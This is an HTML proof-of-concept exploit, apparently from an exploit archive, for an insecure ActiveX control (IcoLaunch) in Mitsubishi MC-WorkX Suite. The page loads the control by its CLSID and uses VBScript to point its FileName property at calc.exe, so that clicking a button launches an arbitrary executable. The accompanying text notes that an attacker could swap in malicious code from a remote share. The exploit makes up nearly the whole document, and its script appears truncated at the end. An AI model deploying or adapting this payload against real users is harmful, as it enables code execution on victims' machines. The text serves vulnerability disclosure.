< html >
< object classid = 'clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id = 'target' ></ object >
< title >Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</ title >
< p >This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</ p >
< script language = 'vbscript' >
file="C:\\WINDOWS\\system32\\calc.exe"
target.FileName = file
|